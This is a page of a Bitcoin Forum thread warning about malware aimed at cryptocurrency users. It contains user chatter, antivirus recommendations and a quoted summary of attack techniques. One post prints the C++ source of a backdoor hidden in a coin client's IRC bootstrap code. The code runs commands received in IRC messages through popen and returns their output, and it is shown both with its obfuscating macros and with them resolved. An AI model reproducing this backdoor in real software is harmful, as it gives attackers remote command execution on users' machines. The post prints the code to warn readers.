Bitcoin Forum
April 26, 2024, 07:04:24 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 686758 times)
innoxious06
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
January 18, 2018, 03:44:48 AM
 #381

does anyone here tried cisco amp?
1714115064
Hero Member
*
Offline Offline

Posts: 1714115064

View Profile Personal Message (Offline)

Ignore
1714115064
Reply with quote  #2

1714115064
Report to moderator
1714115064
Hero Member
*
Offline Offline

Posts: 1714115064

View Profile Personal Message (Offline)

Ignore
1714115064
Reply with quote  #2

1714115064
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
paulus51
Sr. Member
****
Offline Offline

Activity: 616
Merit: 321



View Profile
January 18, 2018, 06:57:41 PM
 #382

Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected
3zy
Newbie
*
Offline Offline

Activity: 16
Merit: 0


View Profile WWW
January 18, 2018, 07:14:00 PM
 #383

recenlty I was a victim of this.
v.stekelenburg
Newbie
*
Offline Offline

Activity: 16
Merit: 0


View Profile WWW
January 18, 2018, 09:58:35 PM
 #384

The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.

For password use a password safe like Enpass or 1password. Copy paste your password is safer than type it out. You can also use a virtual keyboard for that or for your credit card codes. A keylogger will see only the ‘clicks’ then ☺︎
HERMESH KAUR
Newbie
*
Offline Offline

Activity: 130
Merit: 0


View Profile
January 19, 2018, 04:02:02 AM
 #385

Some steps must be taken which are good enough to protect your systems to be hacked such as not to use unknown exe, use of linux which seems to be less vunarable to virus.
rapi
Member
**
Offline Offline

Activity: 336
Merit: 10


View Profile
January 19, 2018, 09:05:09 AM
 #386

I am happy to have made this decision. It will greatly improve my performance
neuran
Copper Member
Newbie
*
Offline Offline

Activity: 288
Merit: 0

GYM Rewards, Mine with Your Body!


View Profile WWW
January 20, 2018, 03:13:53 PM
 #387

Why can't we just get along Smiley

RieraMusic
Jr. Member
*
Offline Offline

Activity: 336
Merit: 1


View Profile
January 20, 2018, 06:06:09 PM
 #388

I need my hardwallet now, too many risk in this crypto world, many scammers out there  Huh lol

█ ▌        Vice Industry// The Revolutionary Adult Cryptocurrency        ▐ █ (https://vicetoken.com/)
Dharn
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
January 20, 2018, 10:24:02 PM
 #389

this is very helpful. am very carefree while on the net. but with this information i will be more cautious
mworld12
Newbie
*
Offline Offline

Activity: 42
Merit: 0


View Profile
January 20, 2018, 11:17:23 PM
 #390

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
good to know thank you
bramgg.crypto
Member
**
Offline Offline

Activity: 194
Merit: 10

Grow with the flow.


View Profile
January 22, 2018, 01:12:23 PM
 #391

Thank you for this post. I'm kind of a security geek but reading about these attemtps to steal crypto stash made me even more aware of the dangers of not researching something and just go ahead and install random stuff.
spanolesbaluko
Newbie
*
Offline Offline

Activity: 43
Merit: 0


View Profile
January 23, 2018, 04:09:56 PM
 #392

Hello Crypto Investors.

Whenever convenient, provide me with more info on the following ICO's:

1. LiveEdu
2. RestartEnergy
3. Giftz
4. ATF
5. Cointed
6. RedChain
7. Titanium
galwaygolfer
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 23, 2018, 04:49:12 PM
 #393

Whats everyone's view of best virus protection against malware? I switched to Bitdefender several months ago and it had blocked several sites. The only downside i have come across, is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.
agadinata
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
January 23, 2018, 08:56:19 PM
 #394

i've same problem. in my task manager i got "winconhost". its that the malware or not?
mega_carnation
Sr. Member
****
Offline Offline

Activity: 376
Merit: 251


View Profile
January 24, 2018, 03:35:41 AM
 #395

Whats everyone's view of best virus protection against malware?
Paid or free? For paid one I'll stick with ESET, I had it on my laptop but for free one and you are using Windows 10, Windows Defender (a built in anti virus) is enough.
I switched to Bitdefender several months ago and it had blocked several sites. The only downside i have come across, is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.
If Bitdefender is doing that to wallet files that's risky if you had your coins out there, try Malwarebytes.
3zy
Newbie
*
Offline Offline

Activity: 16
Merit: 0


View Profile WWW
January 24, 2018, 04:14:34 AM
 #396

I got mine today via Speedcoin but didn't able to get a screenshot deleted it right away.
hodlcoinfan
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
January 24, 2018, 04:36:49 AM
 #397

Thanks for the heads up!
Still_Alone
Newbie
*
Offline Offline

Activity: 182
Merit: 0


View Profile
January 24, 2018, 05:34:25 AM
 #398

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
very useful information for me. so we should be more careful to be aware of the increasingly sophisticated malware infections today
Raul Lopez
Member
**
Offline Offline

Activity: 117
Merit: 10


View Profile WWW
January 24, 2018, 08:16:08 AM
 #399

Is there still malware infection attempst? Thank you!!

■ ■ ■ ■ ■ ■ ■ Find the best price of any book. Book finder and recommendator ■ ■ ■ ■ ■ ■ ■ Libreris
blockchainlion.com
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile WWW
January 24, 2018, 05:03:45 PM
 #400

Is there still malware infection attempst? Thank you!!

yes of course!!! Be always careful about files that you dowload from the internet AND links that you find on the internet.

Files because of course a malicious file can execute code that creates a backdoor access for attackers or compromises your system.
Links because when you click a link you send a request to a certain server. The server knows your IP address and can start scanning it to find open ports and vulnerabilities, which can ultimately used to run exploits against you and compromise you in many ways.
Also links can simply be phishing attempts, which means you go to a login webpage that looks familiar and put your credentials. These credentials are immediately stolen because the page is crafted by an attacker.
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [20] 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!